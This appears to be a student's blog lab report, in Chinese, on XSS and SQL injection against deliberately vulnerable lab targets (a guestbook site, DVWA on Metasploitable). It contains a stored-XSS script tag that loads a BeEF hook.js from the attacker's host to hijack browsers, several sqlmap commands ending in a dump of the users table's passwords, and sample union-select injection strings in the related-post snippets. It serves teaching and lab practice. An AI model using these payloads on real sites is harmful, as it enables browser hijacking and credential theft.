网络渗透测试实验三 XSS和SQL注入

已于 2023-02-12 10:48:21 修改
阅读量685 收藏
点赞数 1
文章标签: xss sql 安全 网络
于 2022-11-22 23:21:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62599268/article/details/127991765
版权

实验目的和要求

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

 

实验步骤

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

  1. 利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

 4c719d2294264f15977b630560eda50c.jpg

 

 

  1. Kali使用beef生成恶意代码,截图。

使用beef-xss指令(需要提前安装beef)。

3a0e27be288a48849a9b589cfbf97d79.png 3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。

e6a98da9c5724aa291e0e12a6142312d.png 4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

使用账号密码(均为admin)登录login.htm,审核用户留言,只要用户访问这个留言板将会被劫持,劫持网站为学校网页。

f6a397883008488d824fa17b08c991f3.png

 

1cd0c1957c5d47db82a87ef494620045.png

 

 5、回答问题:实验中XSS攻击属于哪种类型?

XSS属于存储型攻击。

 

 

SQL注入部分:DVWA+SQLmap+Mysql注入实战

 

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

b859d2cc9c9c4ec3a7bb94d3628fd4d1.png

 

在输入框输入1,返回

ID: 1

First name: admin

Surname: admin

返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞,

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#(靶机)

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

3cccb38d666947f7b87243ee5682026b.png

e6b5feda2b244815a1b6ee52d0324d57.png

ff28acb779a9462dbde5334ea44ebf42.png

9a77c186946d4120ac7e83aed6860c89.png

989e99bb24fc44b4b255453f45af5ed2.png

49215953716244cfa44a41a9f15d37f4.png

 由此可知其存在SQL注入漏洞。

2、枚举当前使用的数据库名称和用户名。

91e8f961f66d4e06a658f534668387f9.png  

你输入的命令:

sqlmap -u "http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=ac9a95533cda1d2ff7307cac68d3e5c2" --current-user

ee8222a6f7914e94b21b6eda4d7461c1.png

Sqlmap输出截图。

ee7800cfb8c74f53909c8544513d8162.png

 

3、枚举数据库用户名和密码

你输入的命令:

sqlmap -u "http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=ac9a95533cda1d2ff7307cac68d3e5c2" --user --password

Sqlmap输出截图。

9b294a57ed384aaf9b57bed2221038cb.png

 

 

4、枚举数据库

--dbs:枚举当前数据库

你输入的命令:

sqlmap -u "http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=ac9a95533cda1d2ff7307cac68d3e5c2" --dbs

 Sqlmap输出截图。

e491d969ff0743409aeaa1b92455da1e.png

 

5、枚举数据库和指定数据库的数据表

 -D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

你输入的命令:

sqlmap -u "http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=ac9a95533cda1d2ff7307cac68d3e5c2" --tables

Sqlmap输出截图。

ac83451fe5d442d2b8243aa4c458ded0.png

 

 

 6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=ac9a95533cda1d2ff7307cac68d3e5c2" --columns                               

Sqlmap输出截图。

89d00140cdef4a9399459eebb76e5c97.png

 7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

--dump:存储数据表项

你输入的命令:

sqlmap -u "http://192.168.43.128/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --cookie='security=low; PHPSESSID=68e2303d6ead3b611272e9ebe7b422b9' --string="Surname" -D dvwa -T users -C user,password --dump                                                                        

Sqlmap输出截图。

448ebc6f0da842a2a7093db02a033f92.png

 

实验小结

  1. 在本次实验中,我初步认识了xss以及简单的xss攻击,掌握了简单的SQL注入攻击及原理,同时学会了用beef生成恶意代码等知识。
  2. 这次的实验比较困难,但是通过对学长学姐的博客参考学习,我解决了很多问题,让我得以成功完成实验。
  3. 这次实验也踩了很多坑,很多的指令我以为都是相同的,直接进行了复制,最后发现并不成功,这里还需要将指令改成包含自己靶机的ip地址以及PHPSESSID的值,不然就会一直出错哦。

 

i77.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1780
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
常见sql注入语句和xss注入语句
小白博客
12-22 2843
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
SQL注入XSS与CSRF漏洞的复现及分析
最新发布
Kali与编程
04-14 359
总结起来,SQL注入XSS和CSRF都是常见且危害严重的Web漏洞。理解这些漏洞的复现方法和原理有助于我们更好地制定针对性的安全策略,并通过实施有效的防御措施来保护Web应用不受此类攻击的侵害。攻击者可以在自己的网站上创建类似的表单,诱使用户在其不知情的情况下触发此表单提交,完成转账。当其他用户浏览包含此评论的页面时,会弹出警告框,表明存在XSS漏洞。SQL注入XSS与CSRF漏洞的复现及分析。二、跨站脚本攻击(XSS)漏洞复现与分析。一、SQL注入漏洞复现与分析。
SQL注入XSS攻击
neverSaynever_的博客
02-20 1618
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
XSS测试用例
q908544703的博客
05-28 1959
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
软件安全测试-Web安全测试详解-XSS攻击
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-10 2058
通过该文,可以系统了解xss攻击的原理,测试,防御,无论对手工测试,还是自动化测试都可以很好的根据文章执行。
网络渗透测试 XSSSQL注入
12-02
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;...系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
信安网络渗透测试实验三.docx
12-15
实验报告对 XSSSQL 注入进行了详细的介绍和实验,从实验目的、实验内容、实验过程等方面进行了详细的介绍。实验结果表明,XSS 攻击和 SQL 注入攻击都是非常危险的攻击方式,需要我们采取相应的防御措施来防御...
网络渗透实验三.docx
01-10
实验旨在了解网络渗透攻击的基本原理和防御方法,包括 XSS 攻击和 SQL 注入攻击。实验环境使用 Kali Linux 2 和 Windows Server,工具包括 Beef、AWVS 和 SqlMAP。 XSS 攻击部分: * 了解 XSS 攻击的基本原理:...
【白帽子学习笔记】XSSSQL注入
python_LC_nohtyp的博客
11-17 1530
【白帽子学习笔记】XSSSQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSSSQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
扫描sql注入xss攻击的牛b工具
11-02
扫描sql注射与xss攻击的牛b工具,适合新手初入渗透测试使用的工具,很好有效辅助你们对网站的渗透测试
xss攻击和sql注入
03-19
xss攻击和sql注入
理解什么是sql注入攻击 + xss攻击 + cors 攻击
L的博客
04-14 3735
SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,。SQL注入攻击实例:用户一旦点击登录,如若没有做特殊处理,那么这个非法用户就很得意的登陆进去了。这是为什么呢?分析上述SQL语句我们知道,username=‘ or 1=1 这个语句一定会成功;然后后面加两个 -,这意味着注释,它将后面的语句注释,让他们不起作用。这样,上述语句永远都能正确执行,用户轻易骗过系统,获取合法身份。
XSSSQL注入
LJW_wenjingli7的博客
01-22 356
答:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。通过实验我了解到xsssql注入的概念和基本实践,做这个实验也遇到了很多困难,比如建立网站如何设置,排除输入的问题,beef恶意代码的逆向攻击等都考验我的实际操作,好几串sql注入语句也是让我困惑,难以理解,尝试多了,到最后套用现成语句居然得心应手了。了解XSS攻击实施,理解防御XSS攻击的方法;设置密码后自动跳转beef网站,账号是beef,密码是刚刚设置的密码。
XSSSQL的简单介绍
qq_53188113的博客
12-23 902
XSS 1、什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 2、什么是XSS攻击 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入..
web渗透测试----26、SQL注入漏洞--(1)原理篇
七天
08-26 5463
SQL注入漏洞
破解边界的基本原理.pdf
10-06
3. **案例研究**:通过分析实际案例,读者可以更直观地理解各种漏洞的工作原理及其影响,这些案例可能涉及缓冲区溢出、SQL注入、跨站脚本攻击(XSS)等。 4. **高级渗透技术**:介绍如何进行逆向工程,即逆向分析软件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值